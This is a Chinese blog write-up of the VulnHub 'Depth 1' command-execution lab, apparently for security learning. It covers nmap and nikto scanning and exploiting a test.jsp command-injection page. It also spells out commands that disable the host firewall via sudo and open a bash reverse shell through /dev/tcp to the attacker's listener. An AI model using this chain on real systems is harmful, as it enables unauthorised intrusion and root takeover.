命令执行靶场实战

最新推荐文章于 2024-06-13 08:34:49 发布
最新推荐文章于 2024-06-13 08:34:49 发布
阅读量549 收藏 5
点赞数 1
分类专栏: 靶场实战系列 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23347209/article/details/125058063
版权

文章目录

环境准备

靶场下载地址:https://www.vulnhub.com/entry/depth-1,213/
使用Vmware虚拟机中NAT网络
靶机: 192.168.146.153
攻击机 parrot 192.168.146.129

提示:以下是本篇文章正文内容,下面案例可供参考

一、信息搜集

1、nmap扫描

-A全面扫描
-p-全端口扫描

nmap -A -p- 192.168.146.153

发现只有开放了8080端口
在这里插入图片描述
浏览一下8080端口
在这里插入图片描述

2、使用nikto扫描网站目录

nikto 是一款用来发现 web 应用程序漏洞的一个工具,常用于对web网页服务器进行全面的多种扫描

利用nikto扫描该站点8080端口

nikto -h http://192.168.146.153:8080

发现一个敏感目录👇test.jsp
在这里插入图片描述
点进去访问
可能存在远程命令执行漏洞
在这里插入图片描述
【至此本靶机的信息搜集基本完成】

二、漏洞利用测试

uname -a

成功获取操作系统信息,有回显
在这里插入图片描述
查看home目录下的用户

ls -la /home

发现bill这个用户👇
在这里插入图片描述
继续深入刺探

ls -la /home/bill

考虑是否开启了ssh服务
在这里插入图片描述
查看进程

ps -aux

发现确实开启了ssh服务,但是之前信息搜集阶段nmap没用扫到,猜测可能有防火墙

在这里插入图片描述
在/etc/目录中发现防火墙
在这里插入图片描述
利用ssh执行root权限命令查看回显是否可以使用
补:sudo -l 列出超级用户可执行与无法执行的指令

ssh bill@localhost sudo -l

成功↓
在这里插入图片描述
接着关闭防火墙

ssh bill@localhost sudo ufw disable

在这里插入图片描述

三、nc反弹shell

parrot上先开启4444号端口监听

nc -lvp 4444

利用命令执行漏洞进行nc连接

ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.146.129/4444 0>&1

在这里插入图片描述
nc成功反弹shell
在这里插入图片描述
拿到flag值
在这里插入图片描述
完成,收工😄

出黎on
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA 靶场之 Command Injection(命令执行)原理介绍、分隔符测试、后门写入与源码分析、修复建议
Welcome To Myon'Blog !
02-26 3039
代替 localhost :在操作系统的配置文件中,通常将 localhost(本地主机名)与 127.0.0.1 绑定在一起,这样在应用程序中使用 localhost 时,实际上是在使用本地回环地址,用于访问本机上运行的网络服务和应用程序。在操作系统中,“ &、|、&&、|| ” 都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。:对服务器和应用程序进行安全配置,关闭不必要的服务和功能,限制可执行命令的范围。
DVWA靶场命令执行(Command injection)通关详解
weixin_56464045的博客
12-17 901
DVWA靶场 命令执行 Command injection 详解
pikachu靶场命令执行(RCE)通关教程)
最新发布
记录学习
06-13 207
pikachu靶场之RCE通关教程
命令执行漏洞--ibos靶场靶场环境是掌控安全的)
xiesiyuan1的博客
02-27 1112
命令执行:用户传入的参数,会被当成系统指令来执行,指令内容用户可控,属于代码执行的一种ctrl+u:在view-source模式自动换行。
Oracle的getshell命令执行实战(有版本限制)
weixin_50464560的博客
02-05 5257
文章中涉及到的漏洞均已提交,渗透测试需规范!这是个人认为近期比较有价值的一次渗透测试,分享给大家。主要分为4个步骤:弱口令进入系统;后台sql注入;getshell,远程RDP管理员登录;扩大战果,证明危害。0x01 弱口令在一次针对某站点信息收集的过程中,通过子域名扫描,扫描到某个老旧系统。一看这都2014年的老站了,肯定有搞头!日常使用burp爆破一波试试,没爆破出来但是随手一试,好家伙123/123进入系统,属于是运气拉满了(高强度打码)这里能看到是一个“编辑”人员的权限,并没有什么上传等后台管理的功
PiKachu靶场之RCE(远程系统命令执行)
angry_program的博客
02-21 6773
概述 RCE(remote command/code execute)漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交...
kali2021.3安装dvwa靶场
02-24
接着,使用`chmod -r 777`命令给予dvwa目录读写执行权限,以确保Apache服务器可以正常访问和运行其中的文件。 在安装过程中可能会遇到权限问题,如果出现配置文件缺失的情况,需要复制config.inc.php.dist到config....
vulhub漏洞测试靶场
08-16
Vulhub涵盖了多种类型的漏洞,如SQL注入、XSS跨站脚本、命令注入、文件包含、未授权访问、缓冲区溢出、CSRF跨站请求伪造等。通过实践这些场景,用户可以深入了解每种漏洞的工作原理、攻击方式以及相应的防御策略。 ...
dvwa靶场训练.rar
03-17
5. **命令注入**:当应用程序错误地处理用户输入并将其作为操作系统命令的一部分执行时,就会发生命令注入。DVWA提供了命令注入练习,学习如何避免使用eval()函数,对用户输入进行严格过滤,是防范此类攻击的关键。 ...
sqli-labs-master靶场
07-14
sqli-labs-master靶场提供了实战环境,让学习者能够实践各种SQL注入技巧,如盲注、时间基注入、union注入等,并了解如何修复这些漏洞。 靶场的结构通常包含以下部分: 1. **登录与注册模块**:这是最常见的SQL注入...
本地靶场搭建--常见靶场环境集锦
04-28
upload-labs靶场专门针对文件上传漏洞进行设计,用户可以通过实践了解如何绕过服务器的验证机制,成功上传恶意文件,以及如何利用这些漏洞执行代码或获取服务器权限。 5. xsslabs XSSLabs靶场主要关注的是Web应用中...
DVWA靶场命令执行(小白笔记)
热门推荐
晚风挽着浮云的博客
10-14 1万+
DVWA靶场命令执行 我们在测试一些web工具时,需要某个web应用作为我们的靶机,这时候就首选应用DVWA(Damn Vulnerable Web Application); DVWA是一款基于php&mysql编写的用于常规web漏洞和检测的web脆弱性测试web应用。其中包含了SQL注入,盲注,文件包含,XSS,CSRF等一些常见的WEB漏洞; 下面是一些命令执行 写的不好,多多包涵 在这里我们进行命令输入 这里我们选择DVWA的难度等级 1:难度LOW...
在线靶场-墨者-命令执行2星-Bash漏洞分析溯源
weixin_42079912的博客
08-09 290
打开靶场网页。 根据解题方向:找到poc.cgi文件。查询资料的得知poc.cgi文件在/cgi-bin/路径下。 bash详细分析后得知bash在处理含有函数定义诸如”() { :;};”的环境变量赋值的代码上存在设计缺陷,错误地将函数定义后面的字符串作为命令执行。设法让系统接受一个含有"(函数定义)+(任意命令)“的环境变量赋值则可触发”(任意命令)"部分所表示的代码执行。 用() { :; ...
iwebsec靶场命令执行漏洞(全部)
qq_56041380的博客
04-09 460
应用程序的某些功能需要调用可以执行系统命令的函数,如果这些函数或者函数的参数被用户控制,就有可能通过命令连接符将恶意命令拼接到正常的函数中,从而随意执行系统命令,这就是命令执行漏洞。它属于高危漏洞之一。
iwebsec靶场-命令执行漏洞
dahege666的博客
03-31 875
命令执行漏洞
RCE——命令执行漏洞
zjdda的博客
07-13 1811
命令执行漏洞介绍 应用程序有时需要调用一些执行系统命令的函数、如在PHP中,以下函数: system:system()—执行shell命令也就是向dos发送一条指令。 exec:exec—方便的PHP函数发送一个字符串供操作系统的命令行处理。 shell_exec:shell_exec— 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。 passthru:passthru ()只调用命令,不返回任何结果,但把命令的运行结果原样地直接输出到标准输出设备上。输入/输出— ppopen:pop
DVWA靶场-命令注入漏洞~保姆级教程!!!
2301_77360738的博客
05-10 662
超详细的dvwa靶场Command injection命令注入漏洞低、中、高等级的全面讲解,小白入!!!
命令执行漏洞及Bulldog靶机实战
随 风
10-31 761
一、命令执行产生的原因 命令执行漏洞是指应用有时需要调用一些系统命令函数,如:system()、exec()、shell_exec()、eval()、passthru(),代码未对用户可控参数做过滤,当用户控制这些函数参数时,键可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击。 常见连接符 (1)A;B (2)A&B (3)A|B (4)A&&B (5)A||B ...
web靶机系列-命令执行
rlenew的博客
05-28 622
主机地址:192.168.136.133 目标地址:192.168.136.135 先用nmap搜查: 然后用nitko工具查找网站的信息,看到有敏感文件泄露: 登陆网站并访问/test.jsp,看到界面有提醒用“ls -l /tmp”查看文件 当输入命令后,得到响应则可以认定为命令执行漏洞 查看home目录,挖掘用户信息 ls -alh /home/ 查看具体用户的目录: ls -alh /home/用户名/,发现用户有ssh服务 查看系统消息:uname -a 查看bill用户 sudo命令
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值